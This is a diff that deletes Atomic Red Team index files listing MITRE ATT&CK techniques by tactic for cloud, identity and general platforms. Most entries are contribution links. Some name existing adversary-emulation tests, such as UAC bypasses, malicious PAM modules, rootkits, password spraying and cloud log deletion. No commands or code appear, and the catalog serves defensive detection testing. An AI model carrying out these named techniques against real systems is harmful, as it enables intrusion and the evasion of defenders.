- T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606.002 Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552.008 Chat Messages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.004 Brute Force: Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# defense-evasion
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.008 Email Collection: Mailbox Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.008 Impair Defenses: Disable Cloud Logs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# discovery
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1518.001 Software Discovery: Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# collection
- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114.003 Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# initial-access
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
# persistence
- T1098.003 Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136.003 Create Account: Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# lateral-movement
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021.007 Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# execution
- T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# privilege-escalation
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
# exfiltration
- T1048 Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
atomics/Indexes/Indexes-Markdown/iaas-index.md
-157
View File
@@ -1,157 +0,0 @@
# IaaS Atomic Tests by ATT&CK Tactic & Technique
# defense-evasion
- T1578.004 Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1536 Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.001 Impair Defenses: Disable or Modify Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.008 Impair Defenses: Disable Cloud Logs](../../T1562.008/T1562.008.md)
- Atomic Test #1: AWS - CloudTrail Changes [iaas:aws]
- Atomic Test #2: Azure - Eventhub Deletion [iaas:azure]
- Atomic Test #7: AWS - CloudWatch Log Group Deletes [iaas:aws]
- Atomic Test #8: AWS CloudWatch Log Stream Deletes [iaas:aws]
- T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1578.001 Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# credential-access
- T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.005 Unsecured Credentials: Cloud Instance Metadata API](../../T1552.005/T1552.005.md)
- Atomic Test #2: Azure - Dump Azure Instance Metadata from Virtual Machines [iaas:azure]
- T1522 Cloud Instance Metadata API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606.002 Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1040 Network Sniffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.003 Brute Force: Password Spraying](../../T1110.003/T1110.003.md)
- Atomic Test #9: AWS - Password Spray an AWS using GoAWSConsoleSpray [iaas:aws]
- T1552.001 Unsecured Credentials: Credentials In Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.004 Brute Force: Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1081 Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1496 Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1485 Data Destruction [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# discovery
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1040 Network Sniffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1082 System Information Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1580 Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1049 System Network Connections Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1619 Cloud Storage Object Discovery](../../T1619/T1619.md)
- Atomic Test #1: AWS S3 Enumeration [iaas:azure]
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
- Atomic Test #11: Examine AWS Password Policy [iaas:aws]
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1518.001 Software Discovery: Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1526 Cloud Service Discovery](../../T1526/T1526.md)
- Atomic Test #1: Azure - Dump Subscription Data with MicroBurst [iaas:azure]
- T1046 Network Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# persistence
- T1098.003 Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1525 Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.004 SSH Authorized Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.001 Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md)
- Atomic Test #3: AWS - Create Access Key and Secret Key [iaas:aws]
- [T1136.003 Create Account: Cloud Account](../../T1136.003/T1136.003.md)
- Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
- [T1098 Account Manipulation](../../T1098/T1098.md)
- Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
- Atomic Test #6: Azure - adding user to Azure role in subscription [iaas:azure]
- Atomic Test #7: Azure - adding service principal to Azure role in subscription [iaas:azure]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# collection
- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1530 Data from Cloud Storage Object](../../T1530/T1530.md)
- Atomic Test #1: Azure - Enumerate Azure Blobs with MicroBurst [iaas:azure]
- Atomic Test #2: Azure - Scan for Anonymous Access to Azure Storage (Powershell) [iaas:azure]
- Atomic Test #3: AWS - Scan for Anonymous Access to S3 [iaas:aws]
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# initial-access
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
# lateral-movement
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021.007 Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# execution
- T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.003 User Execution: Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1651 Cloud Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1648 Serverless Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# privilege-escalation
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
# exfiltration
- T1020.001 Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1048 Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
atomics/Indexes/Indexes-Markdown/index.md
-2658
View File
@@ -1,2658 +0,0 @@
# All Atomic Tests by ATT&CK Tactic & Technique
# defense-evasion
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.011 Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.011 Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md)
- Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
- Atomic Test #2: Rundll32 execute VBscript command [windows]
- Atomic Test #3: Rundll32 execute VBscript command using Ordinal number [windows]
- Atomic Test #4: Rundll32 advpack.dll Execution [windows]
- Atomic Test #5: Rundll32 ieadvpack.dll Execution [windows]
- Atomic Test #6: Rundll32 syssetup.dll Execution [windows]
- Atomic Test #7: Rundll32 setupapi.dll Execution [windows]
- Atomic Test #8: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows]
- Atomic Test #9: Launches an executable using Rundll32 and pcwutl.dll [windows]
- Atomic Test #10: Execution of non-dll using rundll32.exe [windows]
- Atomic Test #11: Rundll32 with Ordinal Value [windows]
- Atomic Test #12: Rundll32 with Control_RunDLL [windows]
- Atomic Test #13: Rundll32 with desk.cpl [windows]
- T1143 Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- T1578.004 Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1148 HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [macos, linux]
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [macos, linux]
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [macos, linux]
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [macos, linux]
- Atomic Test #5: chown - Change file or folder ownership and group [macos, linux]
- Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux]
- Atomic Test #7: chown - Change file or folder mode ownership only [macos, linux]
- Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
- Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
- Atomic Test #10: Chmod through c script [macos, linux]
- Atomic Test #11: Chown through c script [macos, linux]
- [T1216.001 Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1006 Direct Volume Access](../../T1006/T1006.md)
- Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows]
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1014 Rootkit](../../T1014/T1014.md)
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #3: dynamic-linker based rootkit (libprocesshider) [linux]
- Atomic Test #4: Loadable Kernel Module based Rootkit (Diamorphine) [linux]
- T1109 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.007 Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
- Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- Atomic Test #10: UACME Bypass Method 23 [windows]
- Atomic Test #11: UACME Bypass Method 31 [windows]
- Atomic Test #12: UACME Bypass Method 33 [windows]
- Atomic Test #13: UACME Bypass Method 34 [windows]
- Atomic Test #14: UACME Bypass Method 39 [windows]
- Atomic Test #15: UACME Bypass Method 56 [windows]
- Atomic Test #16: UACME Bypass Method 59 [windows]
- Atomic Test #17: UACME Bypass Method 61 [windows]
- Atomic Test #18: WinPwn - UAC Magic [windows]
- Atomic Test #19: WinPwn - UAC Bypass ccmstp technique [windows]
- Atomic Test #20: WinPwn - UAC Bypass DiskCleanup technique [windows]
